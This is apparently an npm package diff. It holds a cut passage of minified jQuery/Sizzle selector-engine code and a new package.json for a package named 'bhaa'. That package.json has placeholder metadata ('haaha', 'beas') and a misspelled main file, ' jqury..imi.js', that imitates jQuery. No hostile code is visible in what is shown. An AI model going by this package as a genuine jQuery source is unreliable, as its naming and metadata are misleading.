n,r,i,o=t.getElementById(e);if(o){if((n=o.getAttributeNode("id"))&&n.value===e)return[o];for(i=t.getElementsByName(e),r=0;o=i[r++];)if((n=o.getAttributeNode("id"))&&n.value===e)return[o]}return[]}}),r.find.TAG=n.getElementsByTagName?function(e,t){return void 0!==t.getElementsByTagName?t.getElementsByTagName(e):n.qsa?t.querySelectorAll(e):void 0}:function(e,t){var n,r=[],i=0,o=t.getElementsByTagName(e);if("*"===e){for(;n=o[i++];)1===n.nodeType&&r.push(n);return r}return o},r.find.CLASS=n.getElementsByClassName&&function(e,t){if(void 0!==t.getElementsByClassName&&g)return t.getElementsByClassName(e)},y=[],v=[],(n.qsa=K.test(d.querySelectorAll))&&(ce(function(e){var t;h.appendChild(e).innerHTML="<a id='"+b+"'></a><select id='"+b+"-\r\\' msallowcapture=''><option selected=''></option></select>",e.querySelectorAll("[msallowcapture^='']").length&&v.push("[*^$]="+M+"*(?:''|\"\")"),e.querySelectorAll("[selected]").length||v.push("\\["+M+"*(?:value|"+R+")"),e.querySelectorAll("[id~="+b+"-]").length||v.push("~="),(t=d.createElement("input")).setAttribute("name",""),e.appendChild(t),e.querySelectorAll("[name='']").length||v.push("\\["+M+"*name"+M+"*="+M+"*(?:''|\"\")"),e.querySelectorAll(":checked").length||v.push(":checked"),e.querySelectorAll("a#"+b+"+*").length||v.push(".#.+[+~]"),e.querySelectorAll("\\\f"),v.push("[\\r\\n\\f]")}),ce(function(e){e.innerHTML="<a href='' disabled='disabled'></a><select disabled='disabled'><option/></select>";var t=d.createElement("input");t.setAttribute("type","hidden"),e.appendChild(t).setAttribute("name","D"),e.querySelectorAll("[name=d]").length&&v.push("name"+M+"*[*^$|!~]?="),2!==e.querySelectorAll(":enabled").length&&v.push(":enabled",":disabled"),h.appendChild(e).disabled=!0,2!==e.querySelectorAll(":disabled").length&&v.push(":enabled",":disabled"),e.querySelectorAll("*,:x"),v.push(",.*:")})),(n.matchesSelector=K.test(m=h.matches||h.webkitMatchesSelector||h.mozMatchesSelector||h.oMatchesSelector||h.msMatchesSelector))&&ce(function(e){n.disconnectedMatch=m.call(e,"*"),m.call(e,"[s!='']:x"),y.push("!=",F)}),v=v.length&&new RegExp(v.join("|")),y=y.length&&new RegExp(y.join("|")),t=K.test(h.compareDocumentPosition),x=t||K.test(h.contains)?function(e,t){var n=9===e.nodeType?e.documentElement:e,r=t&&t.parentNode;return e===r||!(!r||1!==r.nodeType||!(n.contains?n.contains(r):e.compareDocumentPosition&&16&e.compareDocumentPosition(r)))}:function(e,t){if(t)for(;t=t.parentNode;)if(t===e)return!0;return!1},N=t?function(e,t){if(e===t)return f=!0,0;var r=!e.compareDocumentPosition-!t.compareDocumentPosition;return r||(1&(r=(e.ownerDocument||e)==(t.ownerDocument||t)?e.compareDocumentPosition(t):1)||!n.sortDetached&&t.compareDocumentPosition(e)===r?e==d||e.ownerDocument==w&&x(w,e)?-1:t==d||t.ownerDocument==w&&x(w,t)?1:c?P(c,e)-P(c,t):0:4&r?-1:1)}:function(e,t){if(e===t)return f=!0,0;var n,r=0,i=e.parentNode,o=t.parentNode,a=[e],s=[t];if(!i||!o)return e==d?-1:t==d?1:i?-1:o?1:c?P(c,e)-P(c,t):0;if(i===o)return pe(e,t);for(n=e;n=n.parentNode;)a.unshift(n);for(n=t;n=n.parentNode;)s.unshift(n);for(;a[r]===s[r];)r++;return r?pe(a[r],s[r]):a[r]==w?-1:s[r]==w?1:0},d):d},se.matches=function(e,t){return se(e,null,null,t)},se.matchesSelector=function(e,t){if(p(e),n.matchesSelector&&g&&!A[t+" "]&&(!y||!y.test(t))&&(!v||!v.test(t)))try{var r=m.call(e,t);if(r||n.disconnectedMatch||e.document&&11!==e.document.nodeType)return r}catch(e){A(t,!0)}return se(t,d,null,[e]).length>0},se.contains=function(e,t){return(e.ownerDocument||e)!=d&&p(e),x(e,t)},se.attr=function(e,t){(e.ownerDocument||e)!=d&&p(e);var i=r.attrHandle[t.toLowerCase()],o=i&&j.call(r.attrHandle,t.toLowerCase())?i(e,t,!g):void 0;return void 0!==o?o:n.attributes||!g?e.getAttribute(t):(o=e.getAttributeNode(t))&&o.specified?o.value:null},se.escape=function(e){return(e+"").replace(re,ie)},se.error=function(e){throw new Error("Syntax error, unrecognized expression: "+e)},se.uniqueSort=function(e){var t,r=[],i=0,o=0;if(f=!n.detectDuplicates,c=!n.sortStable&&e.slice(0),e.sort(N),f){for(;t=e[o++];)t===e[o]&&(i=r.push(o));for(;i--;)e.splice(r[i],1)}return c=null,e},i=se.getText=function(e){var t,n="",r=0,o=e.nodeType;if(o){if(1===o||9===o||11===o){if("string"==typeof e.textContent)return e.textContent;for(e=e.firstChild;e;e=e.nextSibling)n+=i(e)}else if(3===o||4===o)return e.nodeValue}else for(;t=e[r++];)n+=i(t);return n},(r=se.selectors={cacheLength:50,createPseudo:le,match:G,attrHandle:{},find:{},relative:{">":{dir:"parentNode",first:!0}," ":{dir:"parentNode"},"+":{dir:"previousSibling",first:!0},"~":{dir:"previousSibling"}},preFilter:{ATTR:function(e){return e[1]=e[1].replace(te,ne),e[3]=(e[3]||e[4]||e[5]||"").replace(te,ne),"~="===e[2]&&(e[3]=" "+e[3]+" "),e.slice(0,4)},CHILD:function(e){return e[1]=e[1].toLowerCase(),"nth"===e[1].slice(0,3)?(e[3]||se.error(e[0]),e[4]=+(e[4]?e[5]+(e[6]||1):2*("even"===e[3]||"odd"===e[3])),e[5]=+(e[7]+e[8]||"odd"===e[3])):e[3]&&se.error(e[0]),e},PSEUDO:function(e){var t,n=!e[6]&&e[2];return G.CHILD.test(e[0])?null:(e[3]?e[2]=e[4]||e[5]||"":n&&X.test(n)&&(t=a(n,!0))&&(t=n.indexOf(")",n.length-t)-n.length)&&(e[0]=e[0].slice(0,t),e[2]=n.slice(0,t)),e.slice(0,3))}},filter:{TAG:function(e){var t=e.replace(te,ne).toLowerCase();return"*"===e?function(){return!0}:function(e){return e.nodeName&&e.nodeName.toLowerCase()===t}},CLASS:function(e){var t=E[e+" "];return t||(t=new RegExp("(^|"+M+")"+e+"("+M+"|$)"))&&E(e,function(e){return t.test("string"==typeof e.className&&e.className||void 0!==e.getAttribute&&e.getAttribute("class")||"")})},ATTR:function(e,t,n){return function(r){var i=se.attr(r,e);return null==i?"!="===t:!t||(i+="","="===t?i===n:"!="===t?i!==n:"^="===t?n&&0===i.indexOf(n):"*="===t?n&&i.indexOf(n)>-1:"$="===t?n&&i.slice(-n.length)===n:"~="===t?(" "+i.replace($," ")+" ").indexOf(n)>-1:"|="===t&&(i===n||i.slice(0,n.length+1)===n+"-"))}},CHILD:function(e,t,n,r,i){var o="nth"!==e.slice(0,3),a="last"!==e.slice(-4),s="of-type"===t;return 1===r&&0===i?function(e){return!!e.parentNode}:function(t,n,u){var l,c,f,p,d,h,g=o!==a?"nextSibling":"previousSibling",v=t.parentNode,y=s&&t.nodeName.toLowerCase(),m=!u&&!s,x=!1;if(v){if(o){for(;g;){for(p=t;p=p[g];)if(s?p.nodeName.toLowerCase()===y:1===p.nodeType)return!1;h=g="only"===e&&!h&&"nextSibling"}return!0}if(h=[a?v.firstChild:v.lastChild],a&&m){for(x=(d=(l=(c=(f=(p=v)[b]||(p[b]={}))[p.uniqueID]||(f[p.uniqueID]={}))[e]||[])[0]===T&&l[1])&&l[2],p=d&&v.childNodes[d];p=++d&&p&&p[g]||(x=d=0)||h.pop();)if(1===p.nodeType&&++x&&p===t){c[e]=[T,d,x];break}}else if(m&&(x=d=(l=(c=(f=(p=t)[b]||(p[b]={}))[p.uniqueID]||(f[p.uniqueID]={}))[e]||[])[0]===T&&l[1]),!1===x)for(;(p=++d&&p&&p[g]||(x=d=0)||h.pop())&&((s?p.nodeName.toLowerCase()!==y:1!==p.nodeType)||!++x||(m&&((c=(f=p[b]||(p[b]={}))[p.uniqueID]||(f[p.uniqueID]={}))[e]=[T,x]),p!==t)););return(x-=i)===r||x%r==0&&x/r>=0}}},PSEUDO:function(e,t){var n,i=r.pseudos[e]||r.setFilters[e.toLowerCase()]||se.error("unsupported pseudo: "+e);return i[b]?i(t):i.length>1?(n=[e,e,"",t],r.setFilters.hasOwnProperty(e.toLowerCase())?le(function(e,n){for(var r,o=i(e,t),a=o.length;a--;)e[r=P(e,o[a])]=!(n[r]=o[a])}):function(e){return i(e,0,n)}):i}},pseudos:{not:le(function(e){var t=[],n=[],r=s(e.replace(B,"$1"));return r[b]?le(function(e,t,n,i){for(var o,a=r(e,null,i,[]),s=e.length;s--;)(o=a[s])&&(e[s]=!(t[s]=o))}):function(e,i,o){return t[0]=e,r(t,null,o,n),t[0]=null,!n.pop()}}),has:le(function(e){return function(t){return se(e,t).length>0}}),contains:le(function(e){return e=e.replace(te,ne),function(t){return(t.textContent||i(t)).indexOf(e)>-1}}),lang:le(function(e){return V.test(e||"")||se.error("unsupported lang: "+e),e=e.replace(te,ne).toLowerCase(),function(t){var n;do{if(n=g?t.lang:t.getAttribute("xml:lang")||t.getAttribute("lang"))return(n=n.toLowerCase())===e||0===n.indexOf(e+"-")}while((t=t.parentNode)&&1===t.nodeType);return!1}}),target:function(t){var n=e.location&&e.location.hash;return n&&n.slice(1)===t.id},root:function(e){return e===h},focus:function(e){return e===d.activeElement&&(!d.hasFocus||d.hasFocus())&&!!(e.type||e.href||~e.tabIndex)},enabled:ge(!1),disabled:ge(!0),checked:function(e){var t=e.nodeName.toLowerCase();return"input"===t&&!!e.checked||"option"===t&&!!e.selected},selected:function(e){return e.parentNode&&e.parentNode.selectedIndex,!0===e.selected},empty:function(e){for(e=e.firstChild;e;e=e.nextSibling)if(e.nodeType<6)return!1;return!0},parent:function(e){return!r.pseudos.empty(e)},header:function(e){return J.test(e.nodeName)},input:function(e){return Q.test(e.nodeName)},button:function(e){var t=e.nodeName.toLowerCase();return"input"===t&&"button"===e.type||"button"===t},text:function(e){var t;return"input"===e.nodeName.toLowerCase()&&"text"===e.type&&(null==(t=e.getAttribute("type"))||"text"===t.toLowerCase())},first:ve(function(){return[0]}),last:ve(function(e,t){return[t-1]}),eq:ve(function(e,t,n){return[n<0?n+t:n]}),even:ve(function(e,t){for(var n=0;n<t;n+=2)e.push(n);return e}),odd:ve(function(e,t){for(var n=1;n<t;n+=2)e.push(n);return e}),lt:ve(function(e,t,n){for(var r=n<0?n+t:n>t?t:n;--r>=0;)e.push(r);return e}),gt:ve(function(e,t,n){for(var r=n<0?n+t:n;++r<t;)e.push(r);return e})}}).pseudos.nth=r.pseudos.eq,{radio:!0,checkbox:!0,file:!0,password:!0,image:!0})r.pseudos[t]=de(t);for(t in{submit:!0,reset:!0})r.pseudos[t]=he(t);function me(){}function xe(e){for(var t=0,n=e.length,r="";t<n;t++)r+=e[t].value;return r}function be(e,t,n){var r=t.dir,i=t.next,o=i||r,a=n&&"parentNode"===o,s=C++;return t.first?function(t,n,i){for(;t=t[r];)if(1===t.nodeType||a)return e(t,n,i);return!1}:function(t,n,u){var l,c,f,p=[T,s];if(u){for(;t=t[r];)if((1===t.nodeType||a)&&e(t,n,u))return!0}else for(;t=t[r];)if(1===t.nodeType||a)if(c=(f=t[b]||(t[b]={}))[t.uniqueID]||(f[t.uniqueID]={}),i&&i===t.nodeName.toLowerCase())t=t[r]||t;else{if((l=c[o])&&l[0]===T&&l[1]===s)return p[2]=l[2];if(c[o]=p,p[2]=e(t,n,u))return!0}return!1}}function we(e){return e.length>1?function(t,n,r){for(var i=e.length;i--;)if(!e[i](t,n,r))return!1;return!0}:e[0]}function Te(e,t,n,r,i){for(var o,a=[],s=0,u=e.length,l=null!=t;s<u;s++)(o=e[s])&&(n&&!n(o,
|
package/package.json
ADDED
@@ -0,0 +1,18 @@
|
|
1
|
+
{
|
2
|
+
"name": "bhaa",
|
3
|
+
"version": "1.2.0",
|
4
|
+
"description": "haaha",
|
5
|
+
"main": " jqury..imi.js",
|
6
|
+
"scripts": {
|
7
|
+
"test": "beas"
|
8
|
+
},
|
9
|
+
"repository": {
|
10
|
+
"type": "git",
|
11
|
+
"url": "beas"
|
12
|
+
},
|
13
|
+
"keywords": [
|
14
|
+
"beas"
|
15
|
+
],
|
16
|
+
"author": "beas",
|
17
|
+
"license": "ISC"
|
18
|
+
}
|